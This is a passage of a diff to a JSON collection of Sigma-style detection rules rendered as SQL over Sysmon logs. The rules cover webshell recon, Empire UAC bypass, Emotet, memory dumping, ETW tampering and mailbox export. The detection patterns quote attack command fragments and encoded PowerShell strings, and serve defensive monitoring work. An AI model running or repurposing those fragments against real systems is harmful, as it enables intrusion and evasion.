'\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE 
'%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage 
LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp 
HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -9174,320 +8942,296 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + 
"attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" - }, - { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE 
'%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. 
before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.exfiltration" ], 
"falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "test", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", + "attack.defense_evasion", + 
"attack.t1218.002", "attack.persistence", - "attack.t1053.005" + "attack.t1546" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "title": "Suspicious Parent of Csc.exe", + "id": 
"b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR 
(CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE 
'\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": 
